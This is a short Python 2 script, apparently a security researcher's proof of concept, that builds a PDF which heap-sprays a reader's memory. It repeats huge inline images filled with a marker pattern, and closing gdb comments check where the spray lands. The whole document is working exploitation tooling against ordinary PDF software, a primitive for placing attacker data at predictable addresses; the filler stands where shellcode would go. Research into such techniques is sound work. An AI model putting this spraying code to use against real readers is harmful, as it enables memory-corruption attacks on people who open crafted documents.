feliam

1. ##########################################################################
2. ####   Felipe Andres Manzano     *   felipe.andres.manzano@gmail.com  ####
3. ####   http://twitter.com/feliam *   http://wordpress.com/feliam      ####
4. ##########################################################################
5. ## Heap spraying PDF using inline images
6. from miniPDF import *
7. import zlib,sys
8.  
9. #This construct and add the spraying page
10. def sprayPage(doc,pages, sc="A", size=1024*1024, N=300 , offset=0x44):
11.     #sizes
12.     W,H=size,1
13.     payload = (sc*(size/len(sc)+1))[offset:W*H+offset]
14.  
15.     #contents
16.     contents=  PDFStream(('''q BI /W %d /H %d /CS /G /BPC 8 ID %sEI Q '''%(W,H,payload))*N)
17.     contents.appendFilter(FlateDecode())
18.     doc.add(contents)
19.  
20.     #page
21.     page = PDFDict()
22.     page.add("Type",PDFName("Page"))
23.     page.add("Resources",  PDFDict())
24.     page.add("Contents", PDFRef(contents))
25.  
26.     page.add("Parent",PDFRef(pages))
27.     doc.add(page)
28.     return page
29.  
30.  
31. #The document
32. doc = PDFDoc()
33.  
34. #pages
35. pages = PDFDict()
36. pages.add("Type", PDFName("Pages"))
37.  
38. #spray! fssss fsss fssss
39. #0x1000 <<<<AAAAAAAAA...AAAAAAAAAAA>>><<<<AAAAAAAAA...AAAAAAAAAAA>>>
40. #0x3000 <<<<AAAAAAAAA...AAAAAAAAAAA>>><<<<AAAAAAAAA...AAAAAAAAAAA>>>
41. spage = sprayPage(doc,pages,"<<<<"+"A"*(0x1000-8)+">>>>",0x100000-100,400,0x2c)
42.  
43. #the list of pages
44. pages.add("Kids", PDFArray([PDFRef(spage)]))
45. pages.add("Count", PDFNum(1))
46. doc.add(pages)
47.  
48. #catalog
49. catalog = PDFDict()
50. catalog.add("Type", PDFName("Catalog"))
51. catalog.add("Pages", PDFRef(pages))
52. doc.add(catalog)
53. doc.setRoot(catalog)
54.  
55. print doc
56. ##gdb
57. ##x/4x 0xb0000000 +0x1000*X
58.